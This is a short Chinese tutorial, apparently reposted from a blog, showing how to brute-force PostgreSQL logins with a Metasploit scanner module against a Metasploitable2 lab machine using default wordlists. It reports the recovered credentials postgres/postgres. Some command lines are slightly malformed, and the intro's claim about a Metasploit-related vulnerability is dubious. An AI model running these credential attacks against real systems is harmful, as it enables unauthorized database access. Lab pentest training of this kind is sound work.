Kali学习 | 漏洞利用:4.6 渗透攻击PostgreSQL数据库服务

Kali学习 | 漏洞利用:4.6 渗透攻击PostgreSQL数据库服务

PostgreSQL介绍

PostgreSQL是一个自由的对象——关系数据库服务(数据库管理系统)。它在灵活的BSD-风格许可证下发行。
当第一次启动msfconsole时,Kali中的Metasploit会创建名称为msf3的PostgreSQL数据库,并生成保存渗透测试数据所需的数据表。然后,使用名称为msf3的用户,自动连接到msf3数据库
所以,攻击者可以利用这样的漏洞自动的连接到PostgreSQL数据库。

操作步骤

(1)启动MSFCONSOLE。执行命令如下所示:

#msfconsole

(2)搜索所有有效的PostgreSQL模块。执行命令如下所示:
在这里插入图片描述
以上信息显示了PostgreSQL所有相关的模块。此时可以选择相应的模块进行攻击。

(3)使用PostgreSQL扫描模块。执行命令如下所示:

msf> use auxiliary/scanner/postgres/postgres_login

(4)查看PostgreSQL模块的所有选项。执行命令如下所示:
在这里插入图片描述
以上信息显示了postgres_login模块中可配置的选项。根据用户的攻击情况,选择相应选项进行配置。

(5)使用RHOST选项设置目标系统(本例中为Metasploitable2)。执行命令如下所示:

msf auxiliary(postgres_login)>set RHOSTS 192.168.41.142
RHOST =>192.168.41.142

(6)指定用户名文件。执行命令如下所示:

msf auxiliary(postgres_login)>set user_file/usr/share/metasploitframework/data/wordlists/postgres default_user.txt 
user_file =>/usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt

(7)指定密码文件。执行命令如下所示:

msf auxiliary(postgres login)>set pass_file/usr/share/metasploit-framework/data/wordlists/postgres default pass.txt 
pass_file =>/usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt

(8)运行渗透攻击。执行命令如下所示:
在这里插入图片描述
以上输出的信息是PostgreSQL渗透攻击的一个过程。
测试到PostgreSQL数据库服务的用户名和密码分别是Postgres和Postgres。

参考书籍:《Kali Linux渗透测试技术详解》

发布了91 篇原创文章 · 获赞 16 · 访问量 1696

猜你喜欢

转载自blog.csdn.net/qq_43233085/article/details/103922297